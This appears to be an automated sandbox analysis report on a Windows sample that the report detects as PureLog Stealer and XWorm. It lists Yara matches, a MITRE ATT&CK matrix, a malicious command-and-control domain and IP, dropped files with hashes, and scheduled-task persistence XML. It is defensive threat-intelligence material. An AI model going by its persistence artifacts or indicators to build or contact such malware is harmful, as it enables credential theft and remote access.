Source: Yara match	File source: 00000001.00000002.1308339600.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1406626322.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3724466160.0000000002731000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe PID: 7352, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe PID: 8096, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pNYyTm.exe PID: 8164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pNYyTm.exe PID: 1132, type: MEMORYSTR

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.55f0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.55f0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.pNYyTm.exe.33e2d7c.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ea2f20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ea2f20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.pNYyTm.exe.33e2d7c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1314250556.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1368873082.00000000033C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1308339600.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected XWorm

Source: Yara match	File source: 19.2.pNYyTm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.pNYyTm.exe.34379b0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.pNYyTm.exe.342d6d4.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.pNYyTm.exe.342d6d4.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.pNYyTm.exe.34379b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.1368873082.000000000341E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1308339600.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1406626322.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3724466160.0000000002731000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe PID: 7352, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe PID: 8096, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pNYyTm.exe PID: 8164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pNYyTm.exe PID: 1132, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	1 Scheduled Task/Job	111 Process Injection	1 Masquerading	1 Input Capture	221 Security Software Discovery	Remote Services	1 Input Capture	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	2 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	11 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	2 Registry Run Keys / Startup Folder	131 Virtualization/Sandbox Evasion	Security Account Manager	131 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Clipboard Data	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	22 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	36%	Virustotal		Browse
SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\pNYyTm.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\XClient.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\XClient.exe	34%	ReversingLabs	ByteCode-MSIL.Backdoor.FormBook
C:\Users\user\AppData\Roaming\pNYyTm.exe	34%	ReversingLabs	ByteCode-MSIL.Backdoor.FormBook

Source	Detection	Scanner	Label	Link
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
moneymaker-30608.portmap.host	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
moneymaker-30608.portmap.host	193.161.193.99	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
moneymaker-30608.portmap.host	true	Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, 00000001.00000002.1308339600.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, 0000000E.00000002.3724466160.0000000002731000.00000004.00000800.00020000.00000000.sdmp, pNYyTm.exe, 0000000F.00000002.1368873082.000000000341E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
193.161.193.99	moneymaker-30608.portmap.host	Russian Federation		198134	BITREE-ASRU	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1475711
Start date and time:	2024-07-18 08:34:15 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@20/18@1/1
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 95% Number of executed functions: 152 Number of non-executed functions: 2
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, svchost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target pNYyTm.exe, PID 1132 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:35:05	API Interceptor	9852435x Sleep call for process: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe modified
02:35:09	API Interceptor	31x Sleep call for process: powershell.exe modified
02:35:11	API Interceptor	1x Sleep call for process: pNYyTm.exe modified
08:35:10	Task Scheduler	Run new task: pNYyTm path: C:\Users\user\AppData\Roaming\pNYyTm.exe
08:35:16	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
193.161.193.99	Yq5Gp2g2vB.exe	Get hash	malicious	RedLine	Browse	okmaq-24505.portmap.host:24505/
	JnBNepHH7K.exe	Get hash	malicious	AsyncRAT RedLine	Browse	exara32-64703.portmap.host:64703/
	99SKW728vf.exe	Get hash	malicious	RedLine	Browse	lottie9nwtina-55339.portmap.host:55339/
	amazoninvoiceAF0388d83739dee83479171dbcf.exe	Get hash	malicious	RedLine	Browse	tete2792-22120.portmap.host:22120//

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
moneymaker-30608.portmap.host	SecuriteInfo.com.Win32.RATX-gen.31110.7671.exe	Get hash	malicious	XWorm	Browse	193.161.193.99
moneymaker-30608.portmap.host	SecuriteInfo.com.Win32.CrypterX-gen.2593.22035.exe	Get hash	malicious	XWorm	Browse	193.161.193.99

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
BITREE-ASRU	SecuriteInfo.com.Win32.RATX-gen.31110.7671.exe	Get hash	malicious	XWorm	Browse	193.161.193.99
	SecuriteInfo.com.Win32.CrypterX-gen.2593.22035.exe	Get hash	malicious	XWorm	Browse	193.161.193.99
	0aXmWlKxOj.exe	Get hash	malicious	XWorm	Browse	193.161.193.99
	DriverUpdt.exe	Get hash	malicious	XWorm	Browse	193.161.193.99
	password.exe	Get hash	malicious	SugarDump, XWorm	Browse	193.161.193.99
	Project Al Ain (Hilli & Al Fou#U2019ah) Parks.vbe	Get hash	malicious	StormKitty, XWorm	Browse	193.161.193.99
	9Ok3QP5FFV.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	193.161.193.99
	Client.exe	Get hash	malicious	Quasar	Browse	193.161.193.99
	siuu.exe	Get hash	malicious	XWorm	Browse	193.161.193.99
	y0w04xGM45.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse	193.161.193.99

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pNYyTm.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\pNYyTm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	2232
Entropy (8bit):	5.380503343696294
Encrypted:	false
SSDEEP:	48:+WSU4xympgv4RIoUP7gZ9tK8NPZHUx7u1iMuge//ZPUyuVws:+LHxv2IfLZ2KRH6OugbVws
MD5:	AF312E4EAC25BAFDDD181B92D4F5B3DA
SHA1:	DF4E08CFA2625E73110D803B7EDDC79B8BEA98DD
SHA-256:	CC510A10DDEACAE270B798810DC5E633F25875D5342485C0EBCDFE9924EC7FBC
SHA-512:	C65FD4F2A4B3196EFCC411776484FFB086D739F5659C2D3424C5FF2AA3C45C21F6B4D0FB0F321751429C2FE46FFA78624BB8507BDDE71F4058061096A149D51E
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\Log.tmp

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	3.598349098128234
Encrypted:	false
SSDEEP:	3:rRSFYJKXzovNsra:EFYJKDoWra
MD5:	2C11513C4FAB02AEDEE23EC05A2EB3CC
SHA1:	59177C177B2546FBD8EC7688BAD19D08D32640DE
SHA-256:	BCF3676333E528171EEE1055302F3863A0C89D9FFE7017EA31CF264E13C8A699
SHA-512:	08196AFA62650F1808704DCAD9918DA11175CD8792878F63E35F517B4D6CF407AC9E281D9B71A76E4CC1486CAD7079C56B74ECBEDB0A0F0DD4170FB0D30D2BAD
Malicious:	false
Preview:	....### explorer ###..[WIN]r

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5bkznsjo.q05.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_akd2gzge.xtu.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ckwrtllv.ppw.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_me1zbdde.d2r.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oba4v0sr.iuv.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q0u5ydwp.odu.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q1necarw.5ft.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rpsbq43u.e0h.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp496E.tmp

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1565
Entropy (8bit):	5.1084988869365135
Encrypted:	false
SSDEEP:	48:cge7XQBBYrFdOFzOzN33ODOiDdKrsuTSvv:He7XQBBYrFdOFzOz6dKrsuS
MD5:	E1E0B285468CFAB419CB9C339A3E52C0
SHA1:	75F9AEA47F889943EAFE8853B5D8B6B6BA9B6E2F
SHA-256:	F29908DDDF5FF4C5F54007F4F995CF45DE19E5DD3EC9DD34F74FCE17530CF0F4
SHA-512:	C22A61F633677CE19836759BCCED0477D9D3820B053B87C214AC5750D5484FD93305979FDD6AF8A5EA3F8C30A09E3A4B75A4C28DE6E76595CC89FF0B429BF892
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

C:\Users\user\AppData\Local\Temp\tmp6051.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\pNYyTm.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1565
Entropy (8bit):	5.1084988869365135
Encrypted:	false
SSDEEP:	48:cge7XQBBYrFdOFzOzN33ODOiDdKrsuTSvv:He7XQBBYrFdOFzOz6dKrsuS
MD5:	E1E0B285468CFAB419CB9C339A3E52C0
SHA1:	75F9AEA47F889943EAFE8853B5D8B6B6BA9B6E2F
SHA-256:	F29908DDDF5FF4C5F54007F4F995CF45DE19E5DD3EC9DD34F74FCE17530CF0F4
SHA-512:	C22A61F633677CE19836759BCCED0477D9D3820B053B87C214AC5750D5484FD93305979FDD6AF8A5EA3F8C30A09E3A4B75A4C28DE6E76595CC89FF0B429BF892
Malicious:	false
